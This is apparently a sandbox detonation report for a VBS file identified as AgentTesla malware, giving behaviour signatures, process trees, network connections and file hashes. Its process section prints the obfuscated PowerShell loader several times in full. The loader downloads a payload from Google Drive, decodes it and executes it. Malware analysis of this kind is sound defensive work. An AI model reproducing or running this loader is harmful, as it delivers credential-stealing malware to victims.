Analysis Overview
SHA256
b1f6ace20017902dbd10246ef780c162d7efa2c6eaa26934b45a784223c72293
Threat Level: Known bad
The file RFQINL21052024_PRICE SCHEDULE.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-21 03:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-21 03:42
Reported
2024-05-21 03:44
Platform
win7-20240221-en
Max time kernel
149s
Max time network
145s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2384 set thread context of 2360 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
Files
memory/2620-4-0x000007FEF578E000-0x000007FEF578F000-memory.dmp
memory/2620-5-0x000000001B7D0000-0x000000001BAB2000-memory.dmp
memory/2620-6-0x0000000002290000-0x0000000002298000-memory.dmp
memory/2620-7-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp
memory/2620-8-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5P9UP6GMQYW2S58RUTY4.temp
| MD5 | da50a696b90bbeba959d82bd3d9aeebf |
| SHA1 | 8a7c678eb0ca20d28afa61bb09dd12b1fe15e676 |
| SHA256 | 8cf890db7e1d04b922e2936a358677408407695cdba5f3d30d649888e5279b3a |
| SHA512 | f3d52818a1e2e822c088633dbde0d5d27d4c80e109cc773dc371e1210f5f6f73f1259b81d17c34beb1b01a18d743a82824ff23162df60844caf37966a8c745ea |
C:\Users\Admin\AppData\Roaming\Macco.Cof
| MD5 | 7f40a091f1c133333e814a35fe64d807 |
| SHA1 | 8d278db73f3e270f33b743f358a9cfa1e3bdbe37 |
| SHA256 | 5454057fe5e349e2139169937a8bb6d34b4e6e6ba83bccebaa4e701f3ccc3edb |
| SHA512 | d930b6c0ca34da1f9cad04b5b65218bc98dde299c85627c659ae5a2f25c5321f353f1b826ee4e8bebfa32a2b7184c7a5c69c9e6a4fff42e9232f8604d511dfcb |
memory/2620-14-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp
memory/2384-15-0x0000000006640000-0x000000000AF49000-memory.dmp
memory/2620-16-0x000007FEF578E000-0x000007FEF578F000-memory.dmp
memory/2360-39-0x00000000004B0000-0x0000000001512000-memory.dmp
memory/2360-40-0x00000000004B0000-0x0000000001512000-memory.dmp
memory/2620-41-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp
memory/2360-42-0x00000000004B0000-0x00000000004F2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-21 03:42
Reported
2024-05-21 03:44
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2400 set thread context of 5012 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
